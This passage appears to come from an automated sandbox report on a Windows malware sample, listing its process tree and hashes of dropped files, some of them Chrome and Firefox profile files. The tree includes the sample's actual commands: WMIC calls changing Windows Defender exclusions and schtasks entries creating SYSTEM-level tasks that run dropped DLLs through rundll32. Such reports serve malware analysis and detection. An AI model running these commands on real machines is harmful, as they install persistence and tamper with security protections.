                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                    PID:4924
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:3876
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\tSRsKJOgU\tQDTgs.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "wovFAmtOpAxrHrl" /V1 /F
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                PID:2056
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /CREATE /TN "wovFAmtOpAxrHrl2" /F /xml "C:\Program Files (x86)\tSRsKJOgU\JldLhmX.xml" /RU "SYSTEM"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                PID:4980
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /END /TN "wovFAmtOpAxrHrl"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:2896
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /DELETE /F /TN "wovFAmtOpAxrHrl"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:388
                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:2136
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /CREATE /TN "OrspJZQoDyehPl" /F /xml "C:\Program Files (x86)\QubjZgZsgVxU2\GBNRfQi.xml" /RU "SYSTEM"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                      PID:664
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /CREATE /TN "AfBtKiWWYHIKP2" /F /xml "C:\ProgramData\mjUPcNFqgWzmMMVB\OCjfYtQ.xml" /RU "SYSTEM"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                      PID:4792
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /CREATE /TN "WyNLkpRDmiMxCDgFB2" /F /xml "C:\Program Files (x86)\qZsdLtoLnmdMsAbZENR\rYndoGH.xml" /RU "SYSTEM"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                      PID:3336
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /CREATE /TN "sTjfLxzHimdPzpCahty2" /F /xml "C:\Program Files (x86)\XhLCDmquyDmYC\BVknpHP.xml" /RU "SYSTEM"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                      PID:5048
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /CREATE /TN "CsFigRpOItwcpvTmu" /SC once /ST 13:53:58 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\gGlzHXLNukBnGkUk\WCJRjDzr\jmwrvrH.dll\",#1 /tKdidXPq 385132" /V1 /F
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                      PID:2764
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /run /I /tn "CsFigRpOItwcpvTmu"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:2088
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        schtasks /DELETE /F /TN "YNRMAHHYAWtfapctR"
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:4564
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3164 -s 2604
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                          PID:4800
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 228 -ip 228
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:920
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4880 -ip 4880
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:2448
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4880 -ip 4880
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:1848
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4880 -ip 4880
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:4492
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4880 -ip 4880
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:1212
                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                                  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\gGlzHXLNukBnGkUk\WCJRjDzr\jmwrvrH.dll",#1 /tKdidXPq 385132
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:2992
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\gGlzHXLNukBnGkUk\WCJRjDzr\jmwrvrH.dll",#1 /tKdidXPq 385132
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:4968
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                          schtasks /DELETE /F /TN "CsFigRpOItwcpvTmu"
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:4324
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2920 -ip 2920
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:2540
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3164 -ip 3164
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:3624

                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            2.0MB

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            7f79cf323619a3d993d3228b9b9855fc

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            c1144ff7c5bfa57e880efb6ff540b70b31ad9adb

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            20d3fecdb410e174a7c9008433184f60a06ced2598b3f71ace66318aba3ebc28

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            cfac94825c61401810b2ac216c7dba558d9ca8947d6d9b08c837b2f0715a66459437f4f77fe7f457261965aaaa21c62f1d7bc023b41ae13e7e175837d3fc492e

                                                                                                                                                                                                                                          • C:\ProgramData\BKKJKFBKKECF\JJECFI

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            20KB

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            a603e09d617fea7517059b4924b1df93

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            31d66e1496e0229c6a312f8be05da3f813b3fa9e

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

                                                                                                                                                                                                                                          • C:\ProgramData\ECFHIJKJKF.exe

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4.3MB

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            7f81200d5a684a89dda672e85490ea30

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            47702e5faa3b1c749e33a94f2bf9236657225c64

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            c23b4a05be1b5587fe7d4283c7a99e44b695f486db8f225f5eabf9d7df75f37a

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            f792d4d052a6e4564b245b0144750993a90a7632271af4a5513509f7a53e91f2da1e65e20c1ffeb3dc1d2695d9fe7c108811e009fbfbc34c452737af12cfb5f5

                                                                                                                                                                                                                                          • C:\ProgramData\IEBFHCAKFB.exe

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4.3MB

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            2b40a46d4856cb9f79ecdd2d19ad74e7

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            1dc70b5aecf5e570e06dcabbc94a795df1f1549f

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            394f23df8704f763b90149b09c73a1a841e8590541d33b98a6c7412ff9bfa27c

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            6176850bb3ab1b7bb00c63b1ae4d8e5277dbb41dc4d8f8d3116bdf79c1aaeb111576911b32901745af63225faf4af07786949d7d761208475c555be1efa84654

                                                                                                                                                                                                                                          • C:\ProgramData\KJJJKFIIIJJJ\CFBFHI

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            116KB

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            4e2922249bf476fb3067795f2fa5e794

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            d2db6b2759d9e650ae031eb62247d457ccaa57d2

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            c2c17166e7468877d1e80822f8a5f35a7700ac0b68f3b369a1f4154ae4f811e1

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            8e5e12daf11f9f6e73fb30f563c8f2a64bbc7bb9deffe4969e23081ec1c4073cdf6c74e8dbcc65a271142083ad8312ec7d59505c90e718a5228d369f4240e1da

                                                                                                                                                                                                                                          • C:\ProgramData\KJJJKFIIIJJJ\CFBFHI

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            114KB

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            53769c267e2a9e8c343a25ceb485a70f

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            6c454e54f86ced337a53fcdbae9819440b569f9f

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            71aeeec3e80b545c94e6367981165049ffd43b676bed1e40d26f73ceaa8f6c58

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            5b9e28f6c077b9aa31df11bd1799e6eb0ea6915101372d2e6ab500bd195f8facea9ca66bd58c15afda52ebcf99eaf54f91c67865a50c37b745751b68fdf30bde

                                                                                                                                                                                                                                          • C:\ProgramData\KJJJKFIIIJJJ\CFBFHI

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            112KB

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            87210e9e528a4ddb09c6b671937c79c6

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            3c75314714619f5b55e25769e0985d497f0062f2

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0

                                                                                                                                                                                                                                          • C:\ProgramData\KJJJKFIIIJJJ\DBKKFC

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            7d5c3d731d5ff00b352639d26938c728

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            eb2edeb8f5ba4cdd71316079ebdaa337970abecd

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            ee6bdf25320b628f5b26a9271e6892aa01352cc1083a3101de1f42c654f13466

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            283673981a886989d168c1f9406e846d2472d3b0525fa102a55940bdeb0a7e19d7daefed2ae4162e35c3dcb0a526a7690203724d2ac7cbb981d10b7bfa1a8ed2

                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            2KB

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            c757f8d28bbb144e3bfcbb0a92bc2fc7

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            da68dc5f35f8e1c6f0058a2dda618425a4a4df3b

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            181e6536ddfc5eb23619f0add93cb465c89de808a4cff2e4243e572823ef41f4

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            476655f4b5c6ed8f5448b4f07dac73c53296488de78169cbfebd3c9fbea84f874629ecc63eaeb7d9a769b5f6bfc5d255f378bcc7b26b428243e410b16feaeb30

                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            1e8c8902a3166a98bb3fee1afbafd9ab

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            a0b02b476d937c4422905f3c0d45b244c87cee1c

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            2f2dc35ce1745a5b80e44e783487f08bc237d8691c334b61614c160076861e2c

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            af68cf794ca46a1ea8180e0bee20ea0df35eec96cb3644a2aa0f042a1ff91710508bb75b381d62305751897ed949b61f9524fceb893f046285ddaf202e32fca4

                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\156887258BBD6E1FEF562837733EA04E_5BBC02CEDFD3F7AC9E268D830CF231EE

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            458B

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            2dbbbf614d2b8a07420d881c6c6214f2

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            187414c30e6f9b35da02ba18aaf7fdcc25536b37

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            b747dad8402ea7d540a9b80e355b75daea7a1351cfd6eb0741cd244fe4d9a6b7

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            d3444962139472bb6b52cd56606f417248d7410fb90fee9db6a687e5d0ae965a618668a4935bc579fdcb76796f39b6985f45838c2de0c175baafcc9e0db0ec79

                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            450B

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            d2986620b1d16ae464446e5ec701e04c

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            e990629bf2474d4d61426624128b789deef34404

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            fe687b7c8d250634f57a212067158180863e704dc54874e0750884948b6c226a

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            4756ef45e6840b885bfbedcef03427f00b6e6023d5f7d951ca8be2d8887ddab65281a7c9dc61e2b1a5fec6666ff4918cdff6ff010f932e4482bf9ea0fcd4bba3

                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            458B

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            2ddeae963585fe5fd9a359febb37aaed

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            fe2edbca9e41d6d51a1b04e5462941b9c4935334

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            13ce8c524af3ec0a77ac9a33095bd2f369fd4194042c641aa3cbaa7f6fe23c51

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            eca7c8dda5b5d82add40a319dde3bedc057aedd3867135569352d3f5b4e16ffe84428311e3c971cabb46757a5a4dc5942e1aa0ce516f7fc65b13d4fe8027174b

                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Audio Output Switcher\audiooutputswitcher32_64.exe

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            3.3MB

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            8f8d7470e6962358c2560171dad3a7a4

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            bfcb7cd4a11f46402a98f0ec1d0b151b8a76fdab

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            a6113e9201c6eb35020237bf034fdfd9bd47de30b6b22dac878a264ba615ba72

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            c24de183660b9a9d56e9da0d1b09ec1b776ccdbc8d516d8bd9eb59f86d8bf7cf209c1296992f45a29333a416f524c7f458b55e79db5ef17b168cc5f9624e0782

                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            64KB

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            9e466b4837d8431be725d6b9c1b4d9ef

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            3f247b7c89985a41d839cad351cd0fc182fcb284

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            2f9a5eeb5ac8cec52a3e73621e4d392f501f5d657dfec3215ccd40eec317208d

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            01de0fda555d63b5c38339b0f6d38c28de2a882643439679e63cf5d75f13516b57dc90e8dfb8c638bda328fc12342e58d1e501acec8f85b92dbd5589dac06418

                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            4B

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            f49655f856acb8884cc0ace29216f511

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            960B

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            16846df493521e84fe47cd6b6451ec8f

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            6d99eb017c5aec08d3a7e908bbd4a051ce250c02

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            69f19f2ab2f3625faca623477864766ab1ef3a21712bc892d7b2b0886585b3f9

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            aefa5121601b8273cff6b79b7f76417c71e29e835b66faf3e1a67d0d38fb9ebe90320b75493fd5c4a2d9ea3e3c485d0a84bcdbfb78c26a8ecee3175cd8bd93cd

                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            649B

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            9582632b11301b0fd9fb6b4e3ce8490b

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            89132a7b1b94eac997248bb2b35ff8969ac51665

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            8ddc9080f2eab1d052406fd5a13ff16334dd7c07b13ee990b4ca943c1227d42c

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            345a9ee93faf62777537ef3e0fb8b18ec9e16c031c9f01581442ea6189bc2c76bebba0d9ca442d2ad1f6619285a3dec7269e63d1f5e9129412c6de1e809f0b66

                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            187B

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            136B

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            150B

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            160KB

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            db1cc8854ecb2e5daa7715b09ced05cb

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            d756be72aa72a315299ee7bb532be5dbd99d2f53

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            eb10f5e15204a7d7e32bb903b2db21cc85fa7277b1c324a1481e63703170c2af

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            a846816056625714715daf72da47253bf9a4c01f0cb7e9f323db032a5b3a0bc38ed141c7e686f8cc1d78c75103b799d4d9e6e7b80a30258c37c076f15cd1f909

                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\5bb8de64-30f9-459e-a665-60af440f1a78.tmp

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            769056db93a28aaf0bf4a8e6d29660b4

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            3af9add54db7429eec76913ace333ce8bd2e5337

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            c548d1c2064b77a038af68319406e9efb67dc69da03064b7339dddf63fdd0aa8

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            ac7e6bc231749cbce1b8f1075ff5ad1140a257bc4433efefbb6bd605dc0301ca02bda93409c08760bab1ad328881fa7e30381f5a63fc3eb7a8d9feae6b953a37

                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            2B

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            d751713988987e9331980363e24189ce

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            9KB

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            80c93216671e6822ff1c28d60fe999e5

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            4f4984709bbc6d58270f547ea2fa8fd11d7ba13f

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            f220f1952c7c0d36a6f34e9f0cfc1293103b0c2a6c53b75f7068c4b8c7f7f9d5

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            25d9af97db47623c938bd3cc04408d680fe39cdfd471f3e7e662e027fb9c0ac470ff56ba6968293caca6bc1a16de72025a325057ca7ea5212c85eaaf3576e9af

                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            d4839edd95837653b15a652655c41055

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            af990e51bb94090a7f503ec591aac039d6767ba7

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            9d10d145949a4b1192c5e2ac42174b035a067c24ab4096f9d12e48caa0970255

                                                                                                                                                                                                                                            SHA512

